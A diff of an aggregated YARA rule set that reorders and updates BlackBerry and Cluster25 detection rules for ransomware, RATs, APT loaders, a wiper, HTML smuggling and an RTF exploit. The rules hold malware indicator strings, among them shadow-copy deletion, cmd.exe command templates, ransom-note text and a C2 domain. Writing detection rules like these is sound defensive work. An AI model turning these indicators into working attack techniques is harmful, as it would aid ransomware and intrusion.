-		$s2 = "execCMD"
-		$s3 = "hostname" wide
-		$s4 = "ipconfig" wide
-		$s5 = "tasklist" wide
-		$s6 = "arp -a" wide
-		$sp = {43 3A 5C 55 73 65 72 73 5C 41 64 6D 69 6E 69
-
-                   73 74 72 61 74 6F 72 5C 44 6F 77 6E 6C 6F 61
-
-                   64 73 5C 53 61 6E 74 61 52 61 74 2D 6D 61 69
+		$s1 = "Eternity 2022" wide
+		$s2 = "Eternity" wide
+		$s3 = "Anal Worm" wide
+		$s4 = "Made in Heaven" wide
+		$s5 = "Van Darkholme" wide
+		$s6 = "EternityWorm.exe" wide
 
-                   6E 5C 42 69 6E 61 72 69 65 73 5C 52 65 6C 65
+	condition:
+		( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and all of ( $s* ) )
+}
 
-                   61 73 65 5C 50 6C 75 67 69 6E 73 5C 49 6E 66
+rule BLACKBERRY_Mal_Win32_Chaosransomware_2022 : FILE
+{
+	meta:
+		description = "Detects Ransomware Built by Chaos Ransomware Builder"
+		author = "BlackBerry Threat Research"
+		id = "1fc57dd4-f020-5eb6-8e60-2bce3edfc512"
+		date = "2022-05-10"
+		modified = "2022-07-07"
+		reference = "https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Win32_ChaosRansomware_2022.yar#L3-L45"
+		license_url = "N/A"
+		logic_hash = "d466570965e22b1bb0f1ca30c725d553d7ccf9e25ce2b546f105002260b1d526"
+		score = 75
+		quality = 83
+		tags = "FILE"
+		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
-                   6F 72 6D 61 74 69 6F 6E 2E 70 64 62}
+	strings:
+		$x1 = "Encrypt" ascii wide
+		$x2 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" ascii wide
+		$x3 = "read" ascii wide
+		$r1 = { 20 76 69 72 75 73 }
+		$r2 = { 72 00 61 00 6e 00 73 00 6f 00 6d 00 77 00 61 00 72 00 65 }
+		$z0 = "deleteShadowCopies" ascii wide
+		$z1 = "shadowcopy" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 35KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and pe.number_of_sections == 3 and ( ( all of ( $x* ) ) and ( 1 of ( $r* ) ) and ( 1 of ( $z* ) ) )
 }
-rule BLACKBERRY_Eternityransom : FILE
+rule BLACKBERRY_Mal_Backdoor_Chachi_RAT : FILE
 {
 	meta:
-		description = "Detects Eternity Ransomware"
-		author = "BlackBerry Threat Research Team"
-		id = "2a00bca6-2245-5330-9ad7-522f7bab42f4"
-		date = "2022-05-22"
+		description = "ChaChi RAT used in PYSA Ransomware Campaigns"
+		author = "BlackBerry Threat Research & Intelligence"
+		id = "f0d531d3-585a-5194-ac30-fc62433d0ffc"
+		date = "2022-07-07"
 		modified = "2022-07-07"
-		reference = "https://blogs.blackberry.com/en/2022/06/threat-spotlight-eternity-project-maas-goes-on-and-on"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/EternityRansom.yar#L4-L28"
+		reference = "https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Backdoor_ChaChi_RAT.yar#L1-L25"
 		license_url = "N/A"
-		logic_hash = "9c4eabc8441b0bb80e582f4227f85b3e000e3fc6b1da237d9ce55df9716fb571"
+		logic_hash = "b49f22ceb57a21716c05dcf264cc239596f3a076525d7416961ae1f38bcf25bd"
 		score = 75
-		quality = 85
+		quality = 77
 		tags = "FILE"
-		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
 	strings:
-		$s1 = "The harddisks of your computer have been encrypted with an Military grade encryption algorithm."
-		$s2 = "by Eternity group"
-		$s3 = "Eternity"
-		$s4 = "decryption_password"
-		$s5 = "Povlsomware"
+		$go = { 47 6F 20 62 75 69 6C 64 20 49 44 3A }
+		$dnsStream = { 64 6E 73 53 74 72 65 61 6D }
+		$socks5 = { 53 4F 43 4B 53 35 }
+		$chisel = { 63 68 69 73 65 6C }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them
 }
-
-rule BLACKBERRY_Mal_Infostealer_EXE_Jupyter_Cert_36Ff : FILE
+rule BLACKBERRY_Windealer_Executable : FILE
 {
 	meta:
-		description = "Detects Jupter executables by certificate OOO Sistema (36ff)"
-		author = "BlackBerry Research & Intelligence Team"
-		id = "5671b149-4eb6-5b13-92de-01b71a001802"
-		date = "2021-10-14"
-		modified = "2022-07-06"
-		reference = "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Infostealer_EXE_Jupyter_Cert_36ff.yar#L3-L18"
+		description = "Detects WinDealer Executable"
+		author = "BlackBerry Threat Research Team"
+		id = "68fe2b61-5c2d-5434-a9c5-dae25ccd40a0"
+		date = "2022-06-14"
+		modified = "2022-07-07"
+		reference = "https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malwareZ"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Windealer_executable.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "8f543c592f23257bda8902229a9a8a735bb593254b279a1786fc85734cd56905"
+		logic_hash = "296e89ca89d063d165b6abab6a1e1e0b641cbbe7ff0ea60125c6beada457a95b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
+	strings:
+		$s1 = "28e4-20a6acec"
+		$s2 = "5a7e-42ccdb67"
+		$s3 = "632c-0ef22957"
+		$s4 = "63ae-a20cf808"
+		$s5 = "65ce-731bffbb"
+		$a1 = "remoteip"
+		$a2 = "sessionid"
+		$a3 = "remotedomain"
+		$a4 = "remark"
+
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "Certum Extended Validation Code Signing CA SHA2" and pe.signatures [ i ] . serial == "36:ff:67:4e:b3:05:e9:9c:35:56:5f:a3:01:d5:c4:b0" )
+		uint16( 0 ) == 0x5a4d and 2 of ( $s* ) and 1 of ( $a* )
 }
-
-rule BLACKBERRY_Mal_Win32_Chaosransomware_2022 : FILE
+rule BLACKBERRY_Mal_Win32_Chaos_Builder_Ransomware_2022 : FILE
 {
 	meta:
-		description = "Detects Ransomware Built by Chaos Ransomware Builder"
+		description = "Detects Chaos Ransomware Builder"
 		author = "BlackBerry Threat Research"
-		id = "1fc57dd4-f020-5eb6-8e60-2bce3edfc512"
+		id = "53c812da-802c-5116-89aa-455d1a20a179"
 		date = "2022-05-10"
-		modified = "2022-07-07"
+		modified = "2022-07-08"
 		reference = "https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Win32_ChaosRansomware_2022.yar#L3-L45"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Win32_Chaos_Builder_Ransomware_2022.yar#L4-L44"
 		license_url = "N/A"
-		logic_hash = "d466570965e22b1bb0f1ca30c725d553d7ccf9e25ce2b546f105002260b1d526"
+		logic_hash = "32b68ef2f6e011255080f2666170a4fad42c6a8dd28a05c1a58936dcd27084ec"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
 	strings:
-		$x1 = "Encrypt" ascii wide
-		$x2 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" ascii wide
-		$x3 = "read" ascii wide
-		$r1 = { 20 76 69 72 75 73 }
-		$r2 = { 72 00 61 00 6e 00 73 00 6f 00 6d 00 77 00 61 00 72 00 65 }
-		$z0 = "deleteShadowCopies" ascii wide
-		$z1 = "shadowcopy" ascii wide
+		$s0 = "1qw0ll8p9m8uezhqhyd" ascii wide
+		$s1 = "Chaos Ransomware Builder" ascii wide
+		$s2 = "payloadFutureName" ascii wide
+		$s3 = "read_it.txt" ascii wide
+		$s4 = "encryptedFileExtension" ascii wide
+		$x0 = "1098576" ascii wide
+		$x1 = "2197152" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 35KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and pe.number_of_sections == 3 and ( ( all of ( $x* ) ) and ( 1 of ( $r* ) ) and ( 1 of ( $z* ) ) )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) ) and ( 1 of ( $x* ) ) )
 }
-rule BLACKBERRY_Windealer_Library : FILE
+rule BLACKBERRY_Headertip : FILE
 {
 	meta:
-		description = "Detects WinDealer Loaded DLL"
+		description = "Detects HeaderTip"
 		author = "BlackBerry Threat Research Team"
-		id = "d7fbf21b-9144-532a-ad5d-29543f0ffc33"
-		date = "2022-06-14"
-		modified = "2022-07-07"
-		reference = "https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malwareZ"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Windealer_Library.yar#L1-L26"
+		id = "8569fed8-0fa8-515a-8ca2-ca4c2a959bbe"
+		date = "2022-04-06"
+		modified = "2022-07-06"
+		reference = "https://blogs.blackberry.com/en/2022/04/threat-thursday-headertip-backdoor-shows-attackers-from-china-preying-on-ukraine"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/HeaderTip.yar#L1-L18"
 		license_url = "N/A"
-		logic_hash = "35151a8c0486ceaddb5020cb81f644bba4b01d5f8e4726786abc65ae92ca9c3e"
+		logic_hash = "426c6ebd4ebf85cc4b13d47dc77ae2648fba2b0ccdb7eeaea6b96f19a46c2d4e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
 	strings:
-		$s1 = "C:\\Users\\Public\\Documents\\Tencent\\QQ\\UserDataInfo.ini"
-		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"
-		$s3 = "SOFTWARE\\SogouInput\\red"
-		$s4 = "SOFTWARE\\SogouDesktopBar"
-		$s5 = "MozillaDll.dll"
-		$s6 = "Tencent Files"
-		$s7 = "wangwang"
-		$s8 = "WeChat Files"
-		$s9 = "MyDocument"
-		$s10 = "Skype"
-		$e1 = "AutoGetSystemInfo"
-		$e2 = "GetConfigInfo"
-		$e3 = "partInitOpt"
+		$s1 = "type %temp%\\officecleaner.dat >> %objfile%"
+		$s2 = "product2020.mrbasic.com" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		filesize < 750KB and all of them
 }
 /*
  * YARA Rule Set
  * Repository Name: Cluster25
  * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9
  * Number of Rules: 9
  * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
@@ -170802,42 +170749,6 @@ rule BLACKBERRY_Windealer_Library : FILE
  * NO LICENSE SET
  */
 
-rule CLUSTER25_APT29_Loader_87221_00001 : FILE
-{
-	meta:
-		description = "Detects DLL loader variants used in Nobelium kill-chain"
-		author = "Cluster25"
-		id = "cbee0268-d346-5246-9c2c-97a01ec2e0b3"
-		date = "2023-04-10"
-		modified = "2023-04-10"
-		reference = "https://blog.cluster25.duskrise.com/2022/05/13/cozy-smuggled-into-the-box"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cluster 25/APT29_Loader_87221_00001.yar#L2-L28"
-		license_url = "N/A"
-		logic_hash = "7de041baa35b6b07c11c5f08d456a717007ae356e35e296ec4288cf0293a1d7e"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		tlp = "white"
-		hash1 = "6fc54151607a82d5f4fae661ef0b7b0767d325f5935ed6139f8932bc27309202"
-		hash2 = "23a09b74498aea166470ea2b569d42fd661c440f3f3014636879bd012600ed68"
-
-	strings:
-		$s1 = "%s\\blank.pdf" fullword ascii
-		$s2 = "%s\\AcroSup" fullword ascii
-		$s3 = "vcruntime140.dll" fullword ascii
-		$s4 = "ME3.99.5UUUUUUUUUUU" fullword ascii
-		$c1 = "Rock" fullword ascii
-		$c2 = ".mp3" fullword ascii
-		$c3 = "%s.backup" fullword ascii
-		$sequence1 = { C7 45 ?? 0B 00 10 00 48 8B CF FF 15 ?? ?? ?? 00 85 C0 74 ?? 48 8D 55 ?? 48 89 75 ?? 48 8B CF FF 15 ?? ?? ?? 00 85 C0 74 ?? 48 8B CF FF 15 ?? ?? ?? 00 }
-		$sequence2 = { 0F B6 0B 4C 8D 05 ?? ?? ?? 00 89 4C 24 ?? 4D 8B CD 49 8B CD BA 04 01 00 00 E8 ?? ?? ?? ?? 48 8D 5B 01 48 83 EF 01 75 ?? }
-		$sequence3 = { 4C 8D 8C 24 ?? 00 00 00 8B 53 ?? 44 8D 40 ?? 48 03 CD 44 89 A4 24 ?? 00 00 00 FF 15 ?? ?? ?? 00 8B 43 ?? 44 8B 43 ?? 4A 8D 14 38 48 8D 0C 28 E8 ?? ?? 00 00 8B 4B ?? 4C 8D 8C 24 ?? 00 00 00 8B 53 ?? 48 03 CD 44 8B 84 24 ?? 00 00 00 FF 15 ?? ?? ?? 00 }
-		$sequence4 = { 42 0F B6 8C 32 ?? ?? ?? 00 48 83 C2 03 88 0F 48 8D 7F 01 48 83 FA 2D 7C E7 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and pe.imports ( "kernel32.dll" , "SetThreadContext" ) and pe.imports ( "kernel32.dll" , "ResumeThread" ) and pe.imports ( "kernel32.dll" , "K32GetModuleFileNameExA" ) and 3 of ( $s* ) and all of ( $c* ) and 3 of ( $sequence* )
-}
-
 rule CLUSTER25_UNC1222_Hermeticwiper_23433_10002 : FILE
 {
 	meta:
@@ -170884,34 +170795,32 @@ rule CLUSTER25_UNC1222_Hermeticwiper_23433_10002 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and pe.imports ( "lz32.dll" ) and filesize < 200KB and ( 2 of ( $p* ) and ( all of ( $s* ) or ( 6 of ( $s* ) and any of ( $r* ) ) or 4 of ( $r* ) ) )
 }
-rule CLUSTER25_Ghostwriter_Microbackdoor_72632_00001 : FILE
+
+rule CLUSTER25_APT28_Skinnyboy_Implanter : RUSSIAN THREAT ACTOR FILE
 {
 	meta:
 		description = "No description has been set in the source file - Cluster25"
 		author = "Cluster25"
-		id = "b50ca459-bb0b-567d-968c-772f73f22eb4"
-		date = "2023-04-10"
+		id = "c44faf95-a64c-58f4-97d4-2fe17aefc813"
+		date = "2021-05-24"
 		modified = "2023-04-10"
-		reference = "https://blog.cluster25.duskrise.com/2022/03/08/ghostwriter-unc1151-adopts-microbackdoor-variants-in-cyber-operations-against-targets-in-ukraine"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cluster 25/GhostWriter_MicroBackdoor_72632_00001.yar#L1-L15"
+		reference = "https://21649046.fs1.hubspotusercontent-na1.net/hubfs/21649046/2021-05_FancyBear.pdf"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cluster 25/APT28_SkinnyBoy_Implanter.yar#L2-L16"
 		license_url = "N/A"
-		logic_hash = "cb58d374036f0e52299adb2c7b6795a3610e9d3b29be041d4aa32b44b19a1680"
+		hash = "ae0bc3358fef0ca2a103e694aa556f55a3fed4e98ba57d16f5ae7ad4ad583698"
+		logic_hash = "f5b8944910297988ecf5aecf23d20c384cf141a3a0972baadfacc4969dc46e7c"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		hash1 = "559d8e8f2c60478d1c057b46ec6be912fae7df38e89553804cc566cac46e8e91"
-		tlp = "white"
+		tags = "RUSSIAN, THREAT, ACTOR, FILE"
 
 	strings:
-		$ = "cmd.exe /C \"%s%s\"" fullword wide
-		$ = "client.dll" fullword ascii
-		$ = "ERROR: Unknown command" fullword ascii
-		$ = " *** ERROR: Timeout occured" fullword ascii
-		$ = "%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii
-		$ = "MIIDazCCAlOgAwIBAgIUWOftflCclQXpmWMnL1ewj2F5Y1AwDQYJKoZIhvcNAQEL" fullword ascii
+		$enc_string = {F3 0F 7E 05 ?? ?? ?? ?? 6? [5] 6A ?? 66 [6] 66 [7] F3 0F 7E 05 ?? ?? ?? ?? 8D
+85 [4] 6A ?? 50 66 [7] E8}
+		$heap_ops = {8B [1-5] 03 ?? 5? 5? 6A 08 FF [1-6] FF ?? ?? ?? ?? ?? [0-6] 8B ?? [0-6] 8?}
+		$xor_cycle = { 8A 8C ?? ?? ?? ?? ?? 30 8C ?? ?? ?? ?? ?? 42 3B D0 72 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of them )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and filesize < 100KB and $xor_cycle and $heap_ops and $enc_string
 }
 rule CLUSTER25_UNC1222_Hermeticwiper_23433_10001 : FILE
 {
@@ -170941,89 +170850,70 @@ rule CLUSTER25_UNC1222_Hermeticwiper_23433_10001 : FILE
 	condition:
 		( uint16( 0 ) == 0x5a4d and all of them )
 }
-rule CLUSTER25_Sidewinder_Apt_Rtf_Cve_2017_0199 : FILE
+rule CLUSTER25_Ghostwriter_Microbackdoor_72632_00001 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - Cluster25"
 		author = "Cluster25"
-		id = "0c44f22e-6b21-5dfb-9812-7d8d14e08c1a"
-		date = "2021-09-09"
+		id = "b50ca459-bb0b-567d-968c-772f73f22eb4"
+		date = "2023-04-10"
 		modified = "2023-04-10"
-		reference = "https://21649046.fs1.hubspotusercontent-na1.net/hubfs/21649046/a_rattlesnake_in_the_navy.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cluster 25/sidewinder_apt_rtf_cve_2017_0199.yar#L2-L18"
+		reference = "https://blog.cluster25.duskrise.com/2022/03/08/ghostwriter-unc1151-adopts-microbackdoor-variants-in-cyber-operations-against-targets-in-ukraine"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cluster 25/GhostWriter_MicroBackdoor_72632_00001.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "63c7b8c251a906ea9ea81a7ea838506cd2c0304b4d197eaff8cd3bac99f860ac"
+		logic_hash = "cb58d374036f0e52299adb2c7b6795a3610e9d3b29be041d4aa32b44b19a1680"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "282367417cdc711fbad33eb6988c172c61a9a57d9f926addaefabc36cac3c004"
-		hash2 = "6d021166bdde0eab22fd4a9f398fdd8ccf8b977ff33a77c518f8d16e56d3eeee"
+		hash1 = "559d8e8f2c60478d1c057b46ec6be912fae7df38e89553804cc566cac46e8e91"
+		tlp = "white"
 
 	strings:
-		$head = "{\\rtf1" ascii
-		$obj = "objdata 0105000002000000" ascii
-		$expl = "6D007300680074006D006C000000FFD7E8130000006E756E48544D4C4170706C69636174696F6E" ascii
-		$s1 = "416374697665584F626A656374" ascii nocase
-		$s2 = "5176524d384b4e4734504332565a55753765497764426f72686974366761416259796d356c4563306a4453576e585431334a7173467870484f666b7a4c392b2f3d" ascii nocase
-		$s3 = "62203e3e2031362026203235352c2062203e3e20382026203235352c2062202620323535" ascii nocase
+		$ = "cmd.exe /C \"%s%s\"" fullword wide
+		$ = "client.dll" fullword ascii
+		$ = "ERROR: Unknown command" fullword ascii
+		$ = " *** ERROR: Timeout occured" fullword ascii
+		$ = "%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii
+		$ = "MIIDazCCAlOgAwIBAgIUWOftflCclQXpmWMnL1ewj2F5Y1AwDQYJKoZIhvcNAQEL" fullword ascii
 
 	condition:
-		$head at 0 and $obj and $expl and 2 of ( $s* )
+		( uint16( 0 ) == 0x5a4d and all of them )
 }
 
-rule CLUSTER25_APT28_Skinnyboy_Implanter : RUSSIAN THREAT ACTOR FILE
-{
-	meta:
-		description = "No description has been set in the source file - Cluster25"
-		author = "Cluster25"
-		id = "c44faf95-a64c-58f4-97d4-2fe17aefc813"
-		date = "2021-05-24"
-		modified = "2023-04-10"
-		reference = "https://21649046.fs1.hubspotusercontent-na1.net/hubfs/21649046/2021-05_FancyBear.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cluster 25/APT28_SkinnyBoy_Implanter.yar#L2-L16"
-		license_url = "N/A"
-		hash = "ae0bc3358fef0ca2a103e694aa556f55a3fed4e98ba57d16f5ae7ad4ad583698"
-		logic_hash = "f5b8944910297988ecf5aecf23d20c384cf141a3a0972baadfacc4969dc46e7c"
-		score = 75
-		quality = 75
-		tags = "RUSSIAN, THREAT, ACTOR, FILE"
-
-	strings:
-		$enc_string = {F3 0F 7E 05 ?? ?? ?? ?? 6? [5] 6A ?? 66 [6] 66 [7] F3 0F 7E 05 ?? ?? ?? ?? 8D
-85 [4] 6A ?? 50 66 [7] E8}
-		$heap_ops = {8B [1-5] 03 ?? 5? 5? 6A 08 FF [1-6] FF ?? ?? ?? ?? ?? [0-6] 8B ?? [0-6] 8?}
-		$xor_cycle = { 8A 8C ?? ?? ?? ?? ?? 30 8C ?? ?? ?? ?? ?? 42 3B D0 72 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and filesize < 100KB and $xor_cycle and $heap_ops and $enc_string
-}
-rule CLUSTER25_APT29_Htmlsmuggling_ZIP_82733_00001 : FILE
+rule CLUSTER25_APT29_Loader_87221_00001 : FILE
 {
 	meta:
-		description = "Rule to detect the EnvyScout HTML smuggling with ZIP payload used in the APT29/Nobelium APT29 chain"
+		description = "Detects DLL loader variants used in Nobelium kill-chain"
 		author = "Cluster25"
-		id = "edc2fc67-482f-594e-9b10-f738b9e34c4a"
-		date = "2022-05-12"
+		id = "cbee0268-d346-5246-9c2c-97a01ec2e0b3"
+		date = "2023-04-10"
 		modified = "2023-04-10"
 		reference = "https://blog.cluster25.duskrise.com/2022/05/13/cozy-smuggled-into-the-box"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cluster 25/APT29_HTMLSmuggling_ZIP_82733_00001.yar#L1-L16"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cluster 25/APT29_Loader_87221_00001.yar#L2-L28"
 		license_url = "N/A"
-		hash = "d5c84cbd7dc70e71f3eb24434a58b2f149d0c39faa7e4157552b60c7dbb53d11"
-		logic_hash = "ec51d08551af64100f0f22ef61470ea930be7a457c5aba84e8e00cd9b423616d"
+		logic_hash = "7de041baa35b6b07c11c5f08d456a717007ae356e35e296ec4288cf0293a1d7e"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		tlp = "white"
+		hash1 = "6fc54151607a82d5f4fae661ef0b7b0767d325f5935ed6139f8932bc27309202"
+		hash2 = "23a09b74498aea166470ea2b569d42fd661c440f3f3014636879bd012600ed68"
 
 	strings:
-		$s1 = "new Blob("
-		$s2 = "new Uint8Array("
-		$s3 = "application/octet-stream"
-		$t1 = "saveAs("
-		$t2 = "download("
-		$r1 = { 66 6F 72 28 76 61 72 20 69 20 3D 20 30 78 30 3B 20 69 20 3C 20 64 5B 27 6C 65 6E 67 74 68 27 5D 3B 20 69 2B 2B 29 20 7B 0A 20 20 20 20 64 5B 69 5D 20 3D 20 64 5B 69 5D }
+		$s1 = "%s\\blank.pdf" fullword ascii
+		$s2 = "%s\\AcroSup" fullword ascii
+		$s3 = "vcruntime140.dll" fullword ascii
+		$s4 = "ME3.99.5UUUUUUUUUUU" fullword ascii
+		$c1 = "Rock" fullword ascii
+		$c2 = ".mp3" fullword ascii
+		$c3 = "%s.backup" fullword ascii
+		$sequence1 = { C7 45 ?? 0B 00 10 00 48 8B CF FF 15 ?? ?? ?? 00 85 C0 74 ?? 48 8D 55 ?? 48 89 75 ?? 48 8B CF FF 15 ?? ?? ?? 00 85 C0 74 ?? 48 8B CF FF 15 ?? ?? ?? 00 }
+		$sequence2 = { 0F B6 0B 4C 8D 05 ?? ?? ?? 00 89 4C 24 ?? 4D 8B CD 49 8B CD BA 04 01 00 00 E8 ?? ?? ?? ?? 48 8D 5B 01 48 83 EF 01 75 ?? }
+		$sequence3 = { 4C 8D 8C 24 ?? 00 00 00 8B 53 ?? 44 8D 40 ?? 48 03 CD 44 89 A4 24 ?? 00 00 00 FF 15 ?? ?? ?? 00 8B 43 ?? 44 8B 43 ?? 4A 8D 14 38 48 8D 0C 28 E8 ?? ?? 00 00 8B 4B ?? 4C 8D 8C 24 ?? 00 00 00 8B 53 ?? 48 03 CD 44 8B 84 24 ?? 00 00 00 FF 15 ?? ?? ?? 00 }
+		$sequence4 = { 42 0F B6 8C 32 ?? ?? ?? 00 48 83 C2 03 88 0F 48 8D 7F 01 48 83 FA 2D 7C E7 }
 
 	condition:
-		( filesize > 500KB and all of ( $s* ) and ( $t1 or $t2 ) and $r1 )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and pe.imports ( "kernel32.dll" , "SetThreadContext" ) and pe.imports ( "kernel32.dll" , "ResumeThread" ) and pe.imports ( "kernel32.dll" , "K32GetModuleFileNameExA" ) and 3 of ( $s* ) and all of ( $c* ) and 3 of ( $sequence* )
 }
 rule CLUSTER25_APT28_Skinnyboy_Launcher : RUSSIAN THREAT ACTOR FILE
 {
@@ -171085,11 +170975,68 @@ rule CLUSTER25_Ghostwriter_Microloader_72632_00001 : FILE
 	condition:
 		( uint16( 0 ) == 0x5a4d and all of them )
 }
+rule CLUSTER25_APT29_Htmlsmuggling_ZIP_82733_00001 : FILE
+{
+	meta:
+		description = "Rule to detect the EnvyScout HTML smuggling with ZIP payload used in the APT29/Nobelium APT29 chain"
+		author = "Cluster25"
+		id = "edc2fc67-482f-594e-9b10-f738b9e34c4a"
+		date = "2022-05-12"
+		modified = "2023-04-10"
+		reference = "https://blog.cluster25.duskrise.com/2022/05/13/cozy-smuggled-into-the-box"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cluster 25/APT29_HTMLSmuggling_ZIP_82733_00001.yar#L1-L16"
+		license_url = "N/A"
+		hash = "d5c84cbd7dc70e71f3eb24434a58b2f149d0c39faa7e4157552b60c7dbb53d11"
+		logic_hash = "ec51d08551af64100f0f22ef61470ea930be7a457c5aba84e8e00cd9b423616d"
+		score = 75
+		quality = 75
+		tags = "FILE"
+
+	strings:
+		$s1 = "new Blob("
+		$s2 = "new Uint8Array("
+		$s3 = "application/octet-stream"
+		$t1 = "saveAs("
+		$t2 = "download("
+		$r1 = { 66 6F 72 28 76 61 72 20 69 20 3D 20 30 78 30 3B 20 69 20 3C 20 64 5B 27 6C 65 6E 67 74 68 27 5D 3B 20 69 2B 2B 29 20 7B 0A 20 20 20 20 64 5B 69 5D 20 3D 20 64 5B 69 5D }
+
+	condition:
+		( filesize > 500KB and all of ( $s* ) and ( $t1 or $t2 ) and $r1 )
+}
+rule CLUSTER25_Sidewinder_Apt_Rtf_Cve_2017_0199 : FILE
+{
+	meta:
+		description = "No description has been set in the source file - Cluster25"
+		author = "Cluster25"
+		id = "0c44f22e-6b21-5dfb-9812-7d8d14e08c1a"
+		date = "2021-09-09"
+		modified = "2023-04-10"
